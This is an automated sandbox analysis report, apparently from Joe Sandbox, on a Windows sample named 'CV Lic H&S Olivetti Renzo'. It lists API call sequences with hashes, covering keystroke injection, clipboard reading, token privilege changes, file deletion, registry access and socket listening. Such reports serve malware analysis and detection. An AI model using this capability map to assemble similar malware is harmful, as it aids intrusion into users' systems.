                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: a669de814ce3083a4d44a17f91ee8885868d01925c898adf641b187d3346f87f
                                                                                        • Instruction ID: 91a97957694beb5d6ccd15cdd84e997d7fff6c225fbde5958f5138595a0e46e1
                                                                                        • Opcode Fuzzy Hash: a669de814ce3083a4d44a17f91ee8885868d01925c898adf641b187d3346f87f
                                                                                        • Instruction Fuzzy Hash: F332DD746002A5AFDB12CF64C880BAABBA8FF49344F054A39F695872F1C7B1EC44CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003EB1CD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 6c8f71a024dc0ac18d5144c79c75af76bfb6849d2bd7a0d15f469b54c38007af
                                                                                        • Instruction ID: dff4cf8f4fcb74aeb6037153696c01f99e00aa0bb57324941a117386a1672406
                                                                                        • Opcode Fuzzy Hash: 6c8f71a024dc0ac18d5144c79c75af76bfb6849d2bd7a0d15f469b54c38007af
                                                                                        • Instruction Fuzzy Hash: 9812E271500268ABEB269F66CD49FAFBBB8FF45720F104229F915EB2D1DB709901CB11
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0039EB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003F3AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 003F3AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 003F3B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003F3B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003F3B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003F3B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003F3B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003F3B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003F3B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003F3BCD
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: d0c9ea5657279855063dcabb43593a12f81082275baa22dc4ac77368506bc948
                                                                                        • Instruction ID: a9eceab128fdbe9915952841cf26a3ca55338c73c350e98c67ddc9b9b78ec8d1
                                                                                        • Opcode Fuzzy Hash: d0c9ea5657279855063dcabb43593a12f81082275baa22dc4ac77368506bc948
                                                                                        • Instruction Fuzzy Hash: 3E317071E4021CBFEB216BA58D4AF7F7E6CEB44B50F114025FB05FA1D0DAB19D00AAA4
                                                                                        APIs
                                                                                          • Part of subcall function 003BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                          • Part of subcall function 003BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                          • Part of subcall function 003BB134: GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        • _memset.LIBCMT ref: 003BAD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003BAD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BAD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003BAD82
                                                                                        • GetProcessWindowStation.USER32 ref: 003BAD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 003BADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003BADBF
                                                                                          • Part of subcall function 003BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003BACC0), ref: 003BAB99
                                                                                          • Part of subcall function 003BAB84: CloseHandle.KERNEL32(?,?,003BACC0), ref: 003BABAB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $H*C$default$winsta0
                                                                                        • API String ID: 2063423040-1562247724
                                                                                        • Opcode ID: 997a87125b778a6368bddaec739185f077fc1d12772fbce168dbacbac253b82f
                                                                                        • Instruction ID: d39d8747c2839865def5c987afca36545d4d35213c9459d91745af3f671168e1
                                                                                        • Opcode Fuzzy Hash: 997a87125b778a6368bddaec739185f077fc1d12772fbce168dbacbac253b82f
                                                                                        • Instruction Fuzzy Hash: 73819F71C00A09AFEF12DFA4CD45AEEBB78EF08348F054129FA14B6561D7728E44DB61
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C5FA6,?), ref: 003C6EF1
                                                                                          • Part of subcall function 003C725E: __wsplitpath.LIBCMT ref: 003C727B
                                                                                          • Part of subcall function 003C725E: __wsplitpath.LIBCMT ref: 003C728E
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • _wcscat.LIBCMT ref: 003C6149
                                                                                        • _wcscat.LIBCMT ref: 003C6167
                                                                                        • __wsplitpath.LIBCMT ref: 003C618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003C61A4
                                                                                        • _wcscpy.LIBCMT ref: 003C6209
                                                                                        • _wcscat.LIBCMT ref: 003C621C
                                                                                        • _wcscat.LIBCMT ref: 003C622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003C625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C6289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C6298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 003C62AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C62BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C62E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C62FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C630B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1917200108-1173974218
                                                                                        • Opcode ID: fc6e4e1d84a4dbe82e6c1ad6ca773f534bb2985b3434af49721a4199cbc45eac
                                                                                        • Instruction ID: 404699415b0612aa8baa33fe48e31c1fe601c4c2030f34383b939956803dab67
                                                                                        • Opcode Fuzzy Hash: fc6e4e1d84a4dbe82e6c1ad6ca773f534bb2985b3434af49721a4199cbc45eac
                                                                                        • Instruction Fuzzy Hash: 28511072C0811C6ACB22EB91CD45EEB77BCAF05300F0905EAE585E6141DE369B49CFA8
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(0041DC00), ref: 003D6B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003D6B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 003D6B4C
                                                                                        • CloseClipboard.USER32 ref: 003D6B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003D6B74
                                                                                        • CloseClipboard.USER32 ref: 003D6B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003D6B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 003D6BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 003D6BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003D6BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003D6BE9
                                                                                        • CloseClipboard.USER32 ref: 003D6CF6
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: af54c6f0186c896ebff871bd56bfb064d8b871e71332a59dd26994dbfd672d00
                                                                                        • Instruction ID: 15c4d69f7aba6012770ae0d174e07f11a2ce44e312098b13b30177a4c055bda5
                                                                                        • Opcode Fuzzy Hash: af54c6f0186c896ebff871bd56bfb064d8b871e71332a59dd26994dbfd672d00
                                                                                        • Instruction Fuzzy Hash: 0B518172604301ABD302BFA1DD96F6E77A8AF84B10F00042EF556EB2D1DF70D9098B66
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CF62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 003CF67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CF6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CF6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CF6E2
                                                                                        • __swprintf.LIBCMT ref: 003CF72E
                                                                                        • __swprintf.LIBCMT ref: 003CF767
                                                                                        • __swprintf.LIBCMT ref: 003CF7BB
                                                                                          • Part of subcall function 003A172B: __woutput_l.LIBCMT ref: 003A1784
                                                                                        • __swprintf.LIBCMT ref: 003CF809
                                                                                        • __swprintf.LIBCMT ref: 003CF858
                                                                                        • __swprintf.LIBCMT ref: 003CF8A7
                                                                                        • __swprintf.LIBCMT ref: 003CF8F6
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 835046349-2428617273
                                                                                        • Opcode ID: 5fc674058bd0b2055b49d50ca199f4330bf3975f22b03ce331a89d8e17dc678c
                                                                                        • Instruction ID: 594c34251c4fc56680fe876ddc1b94d358bb65d901ead6831584894b9280e5e4
                                                                                        • Opcode Fuzzy Hash: 5fc674058bd0b2055b49d50ca199f4330bf3975f22b03ce331a89d8e17dc678c
                                                                                        • Instruction Fuzzy Hash: 81A121B2408344ABC716FBA4C985EAFB7ECAF98704F440C6EF585C6151EB34D949CB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003D1B50
                                                                                        • _wcscmp.LIBCMT ref: 003D1B65
                                                                                        • _wcscmp.LIBCMT ref: 003D1B7C
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003D1B8E
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003D1BA8
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003D1BC0
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1BCB
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003D1BE7
                                                                                        • _wcscmp.LIBCMT ref: 003D1C0E
                                                                                        • _wcscmp.LIBCMT ref: 003D1C25
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D1C37
                                                                                        • SetCurrentDirectoryW.KERNEL32(004339FC), ref: 003D1C55
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003D1C5F
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1C6C
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1C7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: bcea57a3a2745d93f6b73b07ed34b5498ea82a61308cf9bdcfc1a9db4998b146
                                                                                        • Instruction ID: a04e05d790b42c94c768af08b9fc812c44dd309b744ba1f8c08769ec1684c44a
                                                                                        • Opcode Fuzzy Hash: bcea57a3a2745d93f6b73b07ed34b5498ea82a61308cf9bdcfc1a9db4998b146
                                                                                        • Instruction Fuzzy Hash: 3731A573A40219BBDB16AFE0EC49BDE77AC9F05321F1401A7F811E3190EB74DA458A68
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003D1CAB
                                                                                        • _wcscmp.LIBCMT ref: 003D1CC0
                                                                                        • _wcscmp.LIBCMT ref: 003D1CD7
                                                                                          • Part of subcall function 003C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C6BEF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003D1D06
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1D11
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003D1D2D
                                                                                        • _wcscmp.LIBCMT ref: 003D1D54
                                                                                        • _wcscmp.LIBCMT ref: 003D1D6B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D1D7D
                                                                                        • SetCurrentDirectoryW.KERNEL32(004339FC), ref: 003D1D9B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003D1DA5
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1DB2
                                                                                        • FindClose.KERNEL32(00000000), ref: 003D1DC2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 2b7a8b2ec7adfe639588a67cfcb0087ff860f2d39431d7b561ec726b35301caa
                                                                                        • Instruction ID: b06267c29489664c8f5db595da7b77c2cbe1aeedaa1ef6f2d00dd6c21fd6c603
                                                                                        • Opcode Fuzzy Hash: 2b7a8b2ec7adfe639588a67cfcb0087ff860f2d39431d7b561ec726b35301caa
                                                                                        • Instruction Fuzzy Hash: E8310873900619BBCF12AFA0ED09BEE77AD9F45320F150567F801A7291DB70DE458A68
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                        • API String ID: 2102423945-2023335898
                                                                                        • Opcode ID: bfbc7f97cf46da1b8befc921d9556efa160c113f60a55a8965861f12c41050a6
                                                                                        • Instruction ID: ee58fcd15b908d1c6460a122254ba1865f9bffc0369d5ca345b3b446fb6274d4
                                                                                        • Opcode Fuzzy Hash: bfbc7f97cf46da1b8befc921d9556efa160c113f60a55a8965861f12c41050a6
                                                                                        • Instruction Fuzzy Hash: FE82BF71D04219CFCF26DF98C8807ADB7B2BF45310F2581AAD959AB391E774AD85CB80
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 003D09DF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003D09EF
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D09FB
                                                                                        • __wsplitpath.LIBCMT ref: 003D0A59
                                                                                        • _wcscat.LIBCMT ref: 003D0A71
                                                                                        • _wcscat.LIBCMT ref: 003D0A83
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003D0A98
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0AAC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0ADE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003D0AFF
                                                                                        • _wcscpy.LIBCMT ref: 003D0B0B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003D0B4A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: 936ff5324cd762e7e00f7a65b489e002561254b6c8d16baee5ed42b1297dbee5
                                                                                        • Instruction ID: a3b1e58a4e73a896dafd20ddfecb6a0508dc34ae9b1a027a3df4de81acb06991
                                                                                        • Opcode Fuzzy Hash: 936ff5324cd762e7e00f7a65b489e002561254b6c8d16baee5ed42b1297dbee5
                                                                                        • Instruction Fuzzy Hash: C5618A725083059FC715EF60D884AAEB3E8FF89310F04496EF989DB251DB31E949CB92
                                                                                        APIs
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                          • Part of subcall function 003BABBB: GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                          • Part of subcall function 003BABBB: GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                          • Part of subcall function 003BABBB: HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                          • Part of subcall function 003BAC56: GetProcessHeap.KERNEL32(00000008,003BA6B5,00000000,00000000,?,003BA6B5,?), ref: 003BAC62
                                                                                          • Part of subcall function 003BAC56: HeapAlloc.KERNEL32(00000000,?,003BA6B5,?), ref: 003BAC69
                                                                                          • Part of subcall function 003BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003BA6B5,?), ref: 003BAC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003BA6D0
                                                                                        • _memset.LIBCMT ref: 003BA6E5
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003BA704
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA715
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 003BA752
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003BA76E
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA78B
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003BA79A
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BA7A1
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003BA7C2
                                                                                        • CopySid.ADVAPI32(00000000), ref: 003BA7C9
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003BA7FA
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003BA820
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003BA834
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 07c48c808fbaf07f08517d8fde4aef9a2c484ef33830663868158e9098511cea
                                                                                        • Instruction ID: 5d6ed860fc2b25ff5c90ac49ab622b1cb0737f9cae33a1036d6bc988ca0f3a69
                                                                                        • Opcode Fuzzy Hash: 07c48c808fbaf07f08517d8fde4aef9a2c484ef33830663868158e9098511cea
                                                                                        • Instruction Fuzzy Hash: F3515B71900A09ABDF01DFA1DD45EEEBBB9FF44308F048129EA15EA690DB349A05CB61
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: B$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$BBB B
                                                                                        • API String ID: 0-3391377756
                                                                                        • Opcode ID: 3cb229eb03df7c5d60d2019c419b35a873c561154fe18e5f305df1ac9734a727
                                                                                        • Instruction ID: 34df2477ae5e490676d871f4a243c77651fd2f64467e69fa418aa8da05048636
                                                                                        • Opcode Fuzzy Hash: 3cb229eb03df7c5d60d2019c419b35a873c561154fe18e5f305df1ac9734a727
                                                                                        • Instruction Fuzzy Hash: DD727E71E043199BDB25DF59C8807AEB7B5BF48310F2481ABE805EB2C0DB749E41DB95
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • _wcscat.LIBCMT ref: 003C6441
                                                                                        • __wsplitpath.LIBCMT ref: 003C645F
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003C6474
                                                                                        • _wcscpy.LIBCMT ref: 003C64A3
                                                                                        • _wcscat.LIBCMT ref: 003C64B8
                                                                                        • _wcscat.LIBCMT ref: 003C64CA
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C64DA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C64EB
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C6506
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2643075503-1173974218
                                                                                        • Opcode ID: 2f30f77c0b511697c078f49e4d2cb922dc15715b39ec996779a9f2b7fa71310a
                                                                                        • Instruction ID: 50729175a36ba03338fcc3a14ca92d79a33b8bc58629f1ba6adaa35bdb5c5c5d
                                                                                        • Opcode Fuzzy Hash: 2f30f77c0b511697c078f49e4d2cb922dc15715b39ec996779a9f2b7fa71310a
                                                                                        • Instruction Fuzzy Hash: EA3184B24083849AC722DBE48885EDBB7DCAF56310F44492EF5D9C7141EA35D90D8767
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E328E
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E332D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E33C5
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E3604
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E3611
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 003C2B5F
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 003C2BE0
                                                                                        • GetKeyState.USER32(000000A0), ref: 003C2BFB
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 003C2C15
                                                                                        • GetKeyState.USER32(000000A1), ref: 003C2C2A
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 003C2C42
                                                                                        • GetKeyState.USER32(00000011), ref: 003C2C54
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 003C2C6C
                                                                                        • GetKeyState.USER32(00000012), ref: 003C2C7E
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 003C2C96
                                                                                        • GetKeyState.USER32(0000005B), ref: 003C2CA8
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        APIs
                                                                                          • Part of subcall function 003B9ABF: CLSIDFromProgID.OLE32 ref: 003B9ADC
                                                                                          • Part of subcall function 003B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 003B9AF7
                                                                                          • Part of subcall function 003B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 003B9B05
                                                                                          • Part of subcall function 003B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003B9B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003DC235
                                                                                        • _memset.LIBCMT ref: 003DC242
                                                                                        • _memset.LIBCMT ref: 003DC360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 003DC38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 003DC397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 003DC3E5
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        APIs
                                                                                          • Part of subcall function 003BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                          • Part of subcall function 003BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                          • Part of subcall function 003BB134: GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 003C7A0F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003D8CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003D8CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 003D8CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 003D8D10
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C6554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003C6564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 003C6583
                                                                                        • __wsplitpath.LIBCMT ref: 003C65A7
                                                                                        • _wcscat.LIBCMT ref: 003C65BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003C65F9
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$B
                                                                                        • API String ID: 0-117492517
